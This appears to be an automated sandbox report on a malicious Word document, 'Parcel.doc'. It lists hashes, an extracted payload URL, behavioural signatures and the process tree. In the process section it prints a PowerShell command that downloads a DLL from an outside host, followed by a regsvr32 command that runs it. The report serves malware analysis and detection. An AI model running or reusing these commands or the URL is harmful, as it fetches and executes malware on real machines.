Analysis
-
max time kernel
138s -
max time network
136s -
platform
windows10_x64 -
resource
win10v200430 -
submitted
07-07-2020 12:18
Static task
static1
Behavioral task
behavioral1
Sample
Parcel.doc
Resource
win7
Behavioral task
behavioral2
Sample
Parcel.doc
Resource
win10v200430
General
-
Target
Parcel.doc
-
Size
153KB
-
MD5
fa02ac2e4a3f00acdaa60c359afcfdd9
-
SHA1
f2917cf0b679650c3a679381f4d34bd1e12674c0
-
SHA256
798868c3e5106b388a0ff01e3f5894fe6d5abfa0789d9efae9b3fe0d0d0db7e6
-
SHA512
81f9ec1e2b59189e2e6a3fdfbd8b7e33dec15ff4d41ae57884efde51af247fbf53065d0275a8bbe19e235893d905a52de3ba1a310756b54052ca6567a157178d
Malware Config
Extracted
http://tattooartcreations.com/wp-includes/js/tinymce/themes/inlite/crypt_da11.dll
Signatures
-
Process spawned unexpected child process 2 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
powershell.exeregsvr32.exedescription pid pid_target process target process Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process 1984 1620 powershell.exe WINWORD.EXE Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process 3192 1620 regsvr32.exe WINWORD.EXE -
Suspicious use of WriteProcessMemory 4 IoCs
Processes:
WINWORD.EXEdescription pid process target process PID 1620 wrote to memory of 1984 1620 WINWORD.EXE powershell.exe PID 1620 wrote to memory of 1984 1620 WINWORD.EXE powershell.exe PID 1620 wrote to memory of 3192 1620 WINWORD.EXE regsvr32.exe PID 1620 wrote to memory of 3192 1620 WINWORD.EXE regsvr32.exe -
Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes:
powershell.exepid process 1984 powershell.exe 1984 powershell.exe 1984 powershell.exe -
Blacklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 16 1984 powershell.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
WINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
Processes:
WINWORD.EXEpid process 1620 WINWORD.EXE 1620 WINWORD.EXE -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 1984 powershell.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
WINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE -
Suspicious use of SetWindowsHookEx 9 IoCs
Processes:
WINWORD.EXEpid process 1620 WINWORD.EXE 1620 WINWORD.EXE 1620 WINWORD.EXE 1620 WINWORD.EXE 1620 WINWORD.EXE 1620 WINWORD.EXE 1620 WINWORD.EXE 1620 WINWORD.EXE 1620 WINWORD.EXE
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Parcel.doc" /o ""1⤵
- Suspicious use of WriteProcessMemory
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Checks processor information in registry
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "& {(New-Object Net.WebClient).DownloadFile('http://tattooartcreations.com/wp-includes/js/tinymce/themes/inlite/crypt_da11.dll','C:\Users\Admin\AppData\Roaming\filename.dll')}"2⤵
- Process spawned unexpected child process
- Suspicious behavior: EnumeratesProcesses
- Blacklisted process makes network request
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\regsvr32.exe"C:\Windows\System32\regsvr32.exe" C:\Users\Admin\AppData\Roaming\filename.dll,DllRegisterServer2⤵
- Process spawned unexpected child process